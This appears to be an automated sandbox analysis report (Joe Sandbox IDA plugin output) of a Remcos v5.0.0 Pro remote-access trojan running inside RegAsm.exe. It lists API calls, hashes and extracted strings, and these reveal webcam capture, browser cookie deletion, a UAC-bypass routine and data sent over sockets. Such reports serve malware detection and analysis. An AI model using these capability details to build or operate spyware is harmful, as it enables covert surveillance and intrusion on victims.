                                                                  • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                                  • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tcp$udp
                                                                  • API String ID: 0-3725065008
                                                                  • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                  • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                  • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                  • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                  • String ID: PkG$XMG$NG$NG
                                                                  • API String ID: 1649129571-3151166067
                                                                  • Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                                                  • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                  • Opcode Fuzzy Hash: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                                                  • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                                                  • MoveFileW.KERNEL32 ref: 00407A6A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                  • String ID: .part
                                                                  • API String ID: 1303771098-3499674018
                                                                  • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                                  • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                  • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                                  • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                  APIs
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InputSend
                                                                  • String ID:
                                                                  • API String ID: 3431551938-0
                                                                  • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                  • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                  • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                  • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                  • String ID: a/p$am/pm$zD
                                                                  • API String ID: 2936374016-2723203690
                                                                  • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                                  • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                  • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                                  • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                  APIs
                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Enum$InfoQueryValue
                                                                  • String ID: [regsplt]$xUG$TG
                                                                  • API String ID: 3554306468-1165877943
                                                                  • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                                                  • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                  • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                                                  • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                  APIs
                                                                  • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                                                  • __fassign.LIBCMT ref: 0044B479
                                                                  • __fassign.LIBCMT ref: 0044B494
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                                                  • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1324828854-0
                                                                  • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                  • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                  • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                  • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID: D[E$D[E
                                                                  • API String ID: 269201875-3695742444
                                                                  • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                  • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                  • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                  • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                                                    • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                    • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                  • String ID: xUG$NG$NG$TG
                                                                  • API String ID: 3114080316-2811732169
                                                                  • Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                                                  • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                  • Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                                                  • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                  APIs
                                                                    • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                                                    • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                    • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                  • _wcslen.LIBCMT ref: 0041B763
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                  • API String ID: 37874593-122982132
                                                                  • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                  • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                  • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                  • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                  APIs
                                                                    • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                    • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                    • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                  • API String ID: 1133728706-4073444585
                                                                  • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                                                  • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                  • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                                                  • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                                  • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                  • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                                  • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                  • String ID: hpF
                                                                  • API String ID: 1852769593-151379673
                                                                  • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                  • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                  • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                  • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                  APIs
                                                                    • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                  • _free.LIBCMT ref: 00450F48
                                                                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                  • _free.LIBCMT ref: 00450F53
                                                                  • _free.LIBCMT ref: 00450F5E
                                                                  • _free.LIBCMT ref: 00450FB2
                                                                  • _free.LIBCMT ref: 00450FBD
                                                                  • _free.LIBCMT ref: 00450FC8
                                                                  • _free.LIBCMT ref: 00450FD3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                  • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                  • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                  • int.LIBCPMT ref: 00411183
                                                                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                  • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                  • String ID: (mG
                                                                  • API String ID: 2536120697-4059303827
                                                                  • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                  • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                  • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                  • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                  • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                  • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                  • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                  • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                  APIs
                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                                                    • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                    • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                  • CoUninitialize.OLE32 ref: 00407629
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                  • API String ID: 3851391207-1839356972
                                                                  • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                  • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                  • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                  • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                  • GetLastError.KERNEL32 ref: 0040BAE7
                                                                  Strings
                                                                  • [Chrome Cookies not found], xrefs: 0040BB01
                                                                  • UserProfile, xrefs: 0040BAAD
                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteErrorFileLast
                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                  • API String ID: 2018770650-304995407
                                                                  • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                                                  • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                  • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                                                  • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                  APIs
                                                                  • AllocConsole.KERNEL32 ref: 0041CDA4
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Console$AllocOutputShowWindow
                                                                  • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                                                  • API String ID: 2425139147-2278869229
                                                                  • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                  • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                  • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                  • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 0043AC69
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                  • __allrem.LIBCMT ref: 0043AC9C
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                  • __allrem.LIBCMT ref: 0043ACD1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 1992179935-0
                                                                  • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                  • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                  • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                  • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prologSleep
                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                  • API String ID: 3469354165-3054508432
                                                                  • Opcode ID: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                                                  • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                  • Opcode Fuzzy Hash: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                                                  • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                  APIs
                                                                    • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                                    • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
